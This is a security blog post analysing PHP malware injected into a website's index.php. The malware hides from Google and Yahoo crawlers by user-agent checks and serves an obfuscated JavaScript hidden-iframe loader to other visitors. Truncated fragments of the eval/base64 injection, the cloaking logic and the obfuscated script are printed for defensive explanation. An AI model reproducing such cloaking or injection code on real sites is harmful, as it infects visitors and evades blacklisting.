Malware hiding from Google

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:

:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >

After we decode it, we got a code that looked like:

if (!stristr($_SERVER[“HTTP_USER_AGENT”],”googlebot”)&&
(!stristr($_SERVER[“HTTP_USER_AGENT”],”yahoo”)))
{
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
}
else
{
return “”;
}

So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case. For everyone else they would see the malware javascript:

var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split(‘*%@’).join(“”));

If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.

Want to read more stories like this one? Subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net. With malware? Need help? send us an email.